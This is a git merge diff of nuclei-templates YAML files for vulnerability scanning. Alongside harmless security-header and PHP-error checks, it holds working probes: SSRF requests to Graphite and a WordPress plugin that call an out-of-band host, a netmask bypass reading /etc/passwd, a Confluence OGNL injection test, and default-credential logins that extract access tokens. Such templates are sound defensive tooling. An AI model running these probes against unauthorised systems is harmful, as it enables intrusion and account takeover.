Merge branch 'master' of https://github.com/projectdiscovery/nuclei-templates into CVE-2015-7450-update
commit
94ba01f60d
|
@ -0,0 +1,24 @@
|
||||||
|
id: CVE-2017-18638
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Graphite 'graphite.composer.views.send_email' SSRF
|
||||||
|
author: huowuzhao
|
||||||
|
severity: high
|
||||||
|
description: send_email in graphite-web/webapp/graphite/composer/views.py in Graphite through 1.1.5 is vulnerable to SSRF. The vulnerable SSRF endpoint can be used by an attacker to have the Graphite web server request any resource. The response to this SSRF request is encoded into an image file and then sent to an e-mail address that can be supplied by the attacker. Thus, an attacker can exfiltrate any information.
|
||||||
|
reference:
|
||||||
|
- http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html
|
||||||
|
- https://github.com/graphite-project/graphite-web/issues/2008
|
||||||
|
- https://github.com/advisories/GHSA-vfj6-275q-4pvm
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2017-18638
|
||||||
|
tags: cve,cve2017,graphite,ssrf,oob
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/composer/send_email?to={{rand_text_alpha(4)}}@{{rand_text_alpha(4)}}&url=http://{{interactsh-url}}'
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: interactsh_protocol
|
||||||
|
words:
|
||||||
|
- "http"
|
|
@ -18,7 +18,6 @@ requests:
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- "phpmyadmin.net"
|
- "phpmyadmin.net"
|
||||||
|
|
|
@ -8,6 +8,8 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9618
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9618
|
||||||
- https://seclists.org/fulldisclosure/2019/Mar/26
|
- https://seclists.org/fulldisclosure/2019/Mar/26
|
||||||
|
- https://www.exploit-db.com/exploits/46537
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-9618
|
||||||
tags: cve,cve2019,wordpress,wp-plugin,lfi
|
tags: cve,cve2019,wordpress,wp-plugin,lfi
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
|
@ -17,7 +19,6 @@ requests:
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
||||||
- type: regex
|
- type: regex
|
||||||
regex:
|
regex:
|
||||||
- "root:.*:0:0"
|
- "root:.*:0:0"
|
||||||
|
|
|
@ -0,0 +1,25 @@
|
||||||
|
id: CVE-2020-28976
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Wordpress Plugin Canto 1.3.0 - Blind SSRF (Unauthenticated)
|
||||||
|
author: LogicalHunter
|
||||||
|
severity: high
|
||||||
|
description: The Canto plugin 1.3.0 for WordPress contains a blind SSRF vulnerability. It allows an unauthenticated attacker can make a request to any internal and external server via /includes/lib/detail.php?subdomain=SSRF.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/49189
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-28976
|
||||||
|
tags: cve,cve2020,ssrf,wordpress,wp-plugin,oob
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/wp-content/plugins/canto/includes/lib/detail.php?subdomain={{interactsh-url}}"
|
||||||
|
- "{{BaseURL}}/wp-content/plugins/canto/includes/lib/get.php?subdomain={{interactsh-url}}"
|
||||||
|
- "{{BaseURL}}/wp-content/plugins/canto/includes/lib/tree.php?subdomain={{interactsh-url}}"
|
||||||
|
|
||||||
|
stop-at-first-match: true
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: interactsh_protocol
|
||||||
|
words:
|
||||||
|
- "http"
|
|
@ -13,9 +13,6 @@ info:
|
||||||
- https://github.com/HewlettPackard/LinuxKI/commit/10bef483d92a85a13a59ca65a288818e92f80d78
|
- https://github.com/HewlettPackard/LinuxKI/commit/10bef483d92a85a13a59ca65a288818e92f80d78
|
||||||
- https://www.hpe.com/us/en/home.html # vendor homepage
|
- https://www.hpe.com/us/en/home.html # vendor homepage
|
||||||
|
|
||||||
# This template exploits a vulnerability in LinuxKI Toolset <= 6.01 which allows remote code execution.
|
|
||||||
# The kivis.php pid parameter received from the user is sent to the shell_exec function, resulting in security vulnerability.
|
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -0,0 +1,36 @@
|
||||||
|
id: CVE-2021-22145
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: ElasticSearch 7.13.3 - Memory disclosure
|
||||||
|
author: dhiyaneshDk
|
||||||
|
severity: medium
|
||||||
|
description: A memory disclosure vulnerability was identified in Elasticsearch 7.10.0 to 7.13.3 error reporting. A user with the ability to submit arbitrary queries to Elasticsearch could submit a malformed query that would result in an error message returned containing previously used portions of a data buffer. This buffer could contain sensitive information such as Elasticsearch documents or authentication details.
|
||||||
|
reference:
|
||||||
|
- https://github.com/jaeles-project/jaeles-signatures/blob/e9595197c80521d64e31b846808095dd07c407e9/cves/elasctic-memory-leak-cve-2021-22145.yaml
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-22145
|
||||||
|
- https://packetstormsecurity.com/files/163648/ElasticSearch-7.13.3-Memory-Disclosure.html
|
||||||
|
tags: cve,cve2021,elascticsearch
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: POST
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/_bulk'
|
||||||
|
headers:
|
||||||
|
Content-Type: application/json
|
||||||
|
body: |
|
||||||
|
@
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- 'root_cause'
|
||||||
|
- 'truncated'
|
||||||
|
- 'reason'
|
||||||
|
part: body
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 400
|
|
@ -1,25 +1,40 @@
|
||||||
id: CVE-2021-26084
|
id: CVE-2021-26084
|
||||||
|
|
||||||
info:
|
info:
|
||||||
author: dhiyaneshDk
|
author: dhiyaneshDk,philippedelteil
|
||||||
severity: critical
|
severity: critical
|
||||||
name: Confluence Server OGNL injection - RCE
|
name: Confluence Server OGNL injection - RCE
|
||||||
description: In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance. The vulnerable endpoints can be accessed by a non-administrator user or unauthenticated user if ‘Allow people to sign up to create their account’ is enabled. To check whether this is enabled go to COG > User Management > User Signup Options. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.
|
description: In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance. The vulnerable endpoints can be accessed by a non-administrator user or unauthenticated user if ‘Allow people to sign up to create their account’ is enabled. To check whether this is enabled go to COG > User Management > User Signup Options. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.
|
||||||
tags: cve,cve2021,rce,confluence
|
tags: cve,cve2021,rce,confluence
|
||||||
reference:
|
reference:
|
||||||
- https://jira.atlassian.com/browse/CONFSERVER-67940
|
- https://jira.atlassian.com/browse/CONFSERVER-67940
|
||||||
- https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md
|
- https://github.com/httpvoid/CVE-Reverse/tree/master/CVE-2021-26084
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-26084
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-26084
|
||||||
|
- https://github.com/Udyz/CVE-2021-26084
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
POST /pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1
|
POST /{{path}} HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
Content-Type: application/x-www-form-urlencoded
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
queryString=aaaa\u0027%2b#{16*8787}%2b\u0027bbb
|
queryString=aaaa\u0027%2b#{16*8787}%2b\u0027bbb
|
||||||
|
|
||||||
|
payloads:
|
||||||
|
path:
|
||||||
|
- pages/createpage-entervariables.action?SpaceKey=x
|
||||||
|
- confluence/pages/createpage-entervariables.action?SpaceKey=x
|
||||||
|
- wiki/pages/createpage-entervariables.action?SpaceKey=x
|
||||||
|
- pages/doenterpagevariables.action
|
||||||
|
- pages/createpage.action?spaceKey=myproj
|
||||||
|
- pages/templates2/viewpagetemplate.action
|
||||||
|
- pages/createpage-entervariables.action
|
||||||
|
- template/custom/content-editor
|
||||||
|
- templates/editor-preload-container
|
||||||
|
- users/user-dark-features
|
||||||
|
|
||||||
|
stop-at-first-match: true
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: status
|
- type: status
|
||||||
|
@ -29,4 +44,4 @@ requests:
|
||||||
- type: word
|
- type: word
|
||||||
part: body
|
part: body
|
||||||
words:
|
words:
|
||||||
- 'value="aaaa{140592=null}'
|
- 'value="aaaa{140592=null}'
|
||||||
|
|
|
@ -0,0 +1,33 @@
|
||||||
|
id: CVE-2021-28918
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Netmask NPM Package SSRF
|
||||||
|
author: johnjhacking
|
||||||
|
severity: critical
|
||||||
|
description: Improper input validation of octal strings in netmask npm package allows unauthenticated remote attackers to perform indeterminate SSRF, RFI, and LFI attacks on many of the dependent packages. A remote unauthenticated attacker can bypass packages relying on netmask to filter IPs and reach critical VPN or LAN hosts.
|
||||||
|
tags: cve,cve2021,npm,netmask,ssrf,lfi
|
||||||
|
reference:
|
||||||
|
- https://github.com/sickcodes/security/blob/master/advisories/SICK-2021-011.md
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-28918
|
||||||
|
- https://github.com/advisories/GHSA-pch5-whg9-qr2r
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/?url=http://0177.0.0.1/server-status"
|
||||||
|
- "{{BaseURL}}/?host=http://0177.0.0.1/server-status"
|
||||||
|
- "{{BaseURL}}/?file=http://0177.0.0.1/etc/passwd"
|
||||||
|
|
||||||
|
stop-at-first-match: true
|
||||||
|
matchers-condition: or
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "Apache Server Status"
|
||||||
|
- "Server Version"
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0:"
|
|
@ -0,0 +1,65 @@
|
||||||
|
id: cs141-default-login
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: CS141 SNMP Module Default Credentials
|
||||||
|
author: socketz
|
||||||
|
severity: medium
|
||||||
|
reference: https://www.generex.de/media/pages/packages/documents/manuals/f65348d5b6-1628841637/manual_CS141_en.pdf
|
||||||
|
tags: hiawatha,iot,default-login
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /api/login HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Length: 44
|
||||||
|
Accept: application/json, text/plain, */*
|
||||||
|
Content-Type: application/json
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Accept-Language: en,es-ES;q=0.9,es;q=0.8
|
||||||
|
Connection: close
|
||||||
|
|
||||||
|
{"userName":"admin","password":"cs141-snmp"}
|
||||||
|
|
||||||
|
- |
|
||||||
|
POST /api/login HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Length: 44
|
||||||
|
Accept: application/json, text/plain, */*
|
||||||
|
Content-Type: application/json
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Accept-Language: en,es-ES;q=0.9,es;q=0.8
|
||||||
|
Connection: close
|
||||||
|
|
||||||
|
{"userName":"engineer","password":"engineer"}
|
||||||
|
|
||||||
|
- |
|
||||||
|
POST /api/login HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Length: 44
|
||||||
|
Accept: application/json, text/plain, */*
|
||||||
|
Content-Type: application/json
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Accept-Language: en,es-ES;q=0.9,es;q=0.8
|
||||||
|
Connection: close
|
||||||
|
|
||||||
|
{"userName":"guest","password":"guest"}
|
||||||
|
|
||||||
|
stop-at-first-match: true
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- 'accessToken'
|
||||||
|
- 'application/json'
|
||||||
|
condition: and
|
||||||
|
part: header
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: kval
|
||||||
|
kval:
|
||||||
|
- accessToken
|
|
@ -1,17 +0,0 @@
|
||||||
id: missing-csp
|
|
||||||
info:
|
|
||||||
name: CSP Not Enforced
|
|
||||||
author: geeknik
|
|
||||||
severity: info
|
|
||||||
description: Checks if there is a CSP header
|
|
||||||
tags: misc,generic
|
|
||||||
|
|
||||||
requests:
|
|
||||||
- method: GET
|
|
||||||
path:
|
|
||||||
- '{{BaseURL}}'
|
|
||||||
redirects: true
|
|
||||||
matchers:
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- '!contains(tolower(all_headers), ''content-security-policy'')'
|
|
|
@ -1,17 +0,0 @@
|
||||||
id: missing-hsts
|
|
||||||
info:
|
|
||||||
name: Strict Transport Security Not Enforced
|
|
||||||
author: Dawid Czarnecki
|
|
||||||
severity: info
|
|
||||||
description: Checks if the HSTS is enabled by looking for Strict Transport Security response header.
|
|
||||||
tags: misc,generic
|
|
||||||
|
|
||||||
requests:
|
|
||||||
- method: GET
|
|
||||||
path:
|
|
||||||
- '{{BaseURL}}'
|
|
||||||
redirects: true
|
|
||||||
matchers:
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- '!contains(tolower(all_headers), ''strict-transport-security'')'
|
|
|
@ -1,18 +0,0 @@
|
||||||
id: missing-x-content-type-options
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: X-Content-Type-Options unidentified
|
|
||||||
author: G4L1T0 and @convisoappsec
|
|
||||||
severity: info
|
|
||||||
description: Check for X-Content-Type-Options header
|
|
||||||
tags: misc,generic
|
|
||||||
|
|
||||||
requests:
|
|
||||||
- method: GET
|
|
||||||
path:
|
|
||||||
- '{{BaseURL}}'
|
|
||||||
redirects: true
|
|
||||||
matchers:
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- '!contains(tolower(all_headers), ''x-content-type-options'')'
|
|
|
@ -1,19 +0,0 @@
|
||||||
id: missing-x-frame-options
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: Clickjacking (Missing XFO header)
|
|
||||||
author: kurohost
|
|
||||||
severity: low
|
|
||||||
tags: misc,generic
|
|
||||||
|
|
||||||
requests:
|
|
||||||
- method: GET
|
|
||||||
path:
|
|
||||||
- "{{BaseURL}}"
|
|
||||||
|
|
||||||
redirects: true
|
|
||||||
max-redirects: 2
|
|
||||||
matchers:
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- "!contains(tolower(all_headers), 'x-frame-options')"
|
|
|
@ -0,0 +1,127 @@
|
||||||
|
id: http-missing-security-headers
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: HTTP Missing Security Headers
|
||||||
|
author: socketz,geeknik,G4L1T0,convisoappsec,kurohost,dawid-czarnecki
|
||||||
|
severity: info
|
||||||
|
description: It searches missing security headers, but obviously, could be so less generic and could be useless for Bug Bounty.
|
||||||
|
tags: misconfig,generic
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}"
|
||||||
|
|
||||||
|
redirects: true
|
||||||
|
max-redirects: 3
|
||||||
|
matchers-condition: or
|
||||||
|
matchers:
|
||||||
|
- type: regex
|
||||||
|
name: strict-transport-security
|
||||||
|
regex:
|
||||||
|
- "(?i)strict-transport-security"
|
||||||
|
negative: true
|
||||||
|
part: header
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
name: content-security-policy
|
||||||
|
regex:
|
||||||
|
- "(?i)content-security-policy"
|
||||||
|
negative: true
|
||||||
|
part: header
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
name: x-frame-options
|
||||||
|
regex:
|
||||||
|
- "(?i)x-frame-options"
|
||||||
|
negative: true
|
||||||
|
part: header
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
name: x-content-type-options
|
||||||
|
regex:
|
||||||
|
- "(?i)x-content-type-options"
|
||||||
|
negative: true
|
||||||
|
part: header
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
name: x-permitted-cross-domain-policies
|
||||||
|
regex:
|
||||||
|
- "(?i)x-permitted-cross-domain-policies"
|
||||||
|
negative: true
|
||||||
|
part: header
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
name: referrer-policy
|
||||||
|
regex:
|
||||||
|
- "(?i)referrer-policy"
|
||||||
|
negative: true
|
||||||
|
part: header
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
name: clear-site-data
|
||||||
|
regex:
|
||||||
|
- "(?i)clear-site-data"
|
||||||
|
negative: true
|
||||||
|
part: header
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
name: cross-origin-embedder-policy
|
||||||
|
regex:
|
||||||
|
- "(?i)cross-origin-embedder-policy"
|
||||||
|
negative: true
|
||||||
|
part: header
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
name: cross-origin-opener-policy
|
||||||
|
regex:
|
||||||
|
- "(?i)cross-origin-opener-policy"
|
||||||
|
negative: true
|
||||||
|
part: header
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
name: cross-origin-resource-policy
|
||||||
|
regex:
|
||||||
|
- "(?i)cross-origin-resource-policy"
|
||||||
|
negative: true
|
||||||
|
part: header
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
name: access-control-allow-origin
|
||||||
|
regex:
|
||||||
|
- "(?i)access-control-allow-origin"
|
||||||
|
negative: true
|
||||||
|
part: header
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
name: access-control-allow-credentials
|
||||||
|
regex:
|
||||||
|
- "(?i)access-control-allow-credentials"
|
||||||
|
negative: true
|
||||||
|
part: header
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
name: access-control-expose-headers
|
||||||
|
regex:
|
||||||
|
- "(?i)access-control-expose-headers"
|
||||||
|
negative: true
|
||||||
|
part: header
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
name: access-control-max-age
|
||||||
|
regex:
|
||||||
|
- "(?i)access-control-max-age"
|
||||||
|
negative: true
|
||||||
|
part: header
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
name: access-control-allow-methods
|
||||||
|
regex:
|
||||||
|
- "(?i)access-control-allow-methods"
|
||||||
|
negative: true
|
||||||
|
part: header
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
name: access-control-allow-headers
|
||||||
|
regex:
|
||||||
|
- "(?i)access-control-allow-headers"
|
|
@ -2,31 +2,39 @@ id: php_errors
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: PHP errors
|
name: PHP errors
|
||||||
author: w4cky_
|
author: w4cky_,geeknik
|
||||||
severity: info
|
severity: info
|
||||||
tags: debug
|
tags: debug,php
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}"
|
- "{{BaseURL}}"
|
||||||
|
|
||||||
matchers:
|
extractors:
|
||||||
- type: word
|
- type: regex
|
||||||
words:
|
regex:
|
||||||
- "Fatal error"
|
- '(?i)Fatal error'
|
||||||
- "Call to undefined method"
|
- '(?i)Call to undefined method'
|
||||||
- "You have an error in your SQL syntax;"
|
- '(?i)You have an error in your SQL syntax'
|
||||||
- "MySQL server version for the right syntax to use near"
|
- '(?i)MySQL server version for the right syntax to use near'
|
||||||
- "PHP Warning"
|
- '(?i)MySQL cannot create a temporary file'
|
||||||
- "PHP Error"
|
- '(?i)PHP (Warning|Error)'
|
||||||
- "Warning: mysql_connect():"
|
- '(?i)Warning\: (pg|mysql)_(query|connect)\(\)'
|
||||||
- "Warning: mysql_query()"
|
- '(?i)failed to open stream\:'
|
||||||
- "Warning: pg_connect():"
|
- '(?i)SAFE MODE Restriction in effect'
|
||||||
- "failed to open stream: HTTP request failed"
|
- '(?i)Cannot modify header information'
|
||||||
- "SAFE MODE Restriction in effect."
|
- '(?i)ORA-00921\: unexpected end of SQL command'
|
||||||
- "Cannot modify header information"
|
- '(?i)ORA-00933\: SQL command not properly ended'
|
||||||
- "ORA-00921: unexpected end of SQL command"
|
- '(?i)ORA-00936\: missing expression'
|
||||||
- "ORA-00933: SQL command not properly ended"
|
- '(?i)ORA-12541\: TNS\:no listener'
|
||||||
- "ORA-00936: missing expression"
|
- '(?i)uncaught exception'
|
||||||
- "ORA-12541: TNS:no listener"
|
- '(?i)include_path'
|
||||||
|
- '(?i)undefined index'
|
||||||
|
- '(?i)undefined variable\:'
|
||||||
|
- '(?i)stack trace\:'
|
||||||
|
- '(?i)expects parameter [0-9]*'
|
||||||
|
- '(?i)Debug Trace'
|
||||||
|
- '(?i)(syntax|parse) error'
|
||||||
|
- '(?i)Allowed Memory Size of \d* Bytes Exhausted'
|
||||||
|
- '(?i)Maximum execution time of \d* seconds exceeded'
|
||||||
|
|
|
@ -8,7 +8,7 @@ info:
|
||||||
A ZipSlip vulnerability in McAfee ePolicy Orchestrator (ePO)
|
A ZipSlip vulnerability in McAfee ePolicy Orchestrator (ePO)
|
||||||
is a type of Path Traversal occurring when archives are unpacked
|
is a type of Path Traversal occurring when archives are unpacked
|
||||||
if the names of the packed files are not properly sanitized.
|
if the names of the packed files are not properly sanitized.
|
||||||
An attacker can create archives with files containing “../” in their names,
|
An attacker can create archives with files containing "../" in their names,
|
||||||
making it possible to upload arbitrary files
|
making it possible to upload arbitrary files
|
||||||
to arbitrary directories or overwrite existing ones during archive extraction.
|
to arbitrary directories or overwrite existing ones during archive extraction.
|
||||||
reference:
|
reference:
|
||||||
|
|
Loading…
Reference in New Issue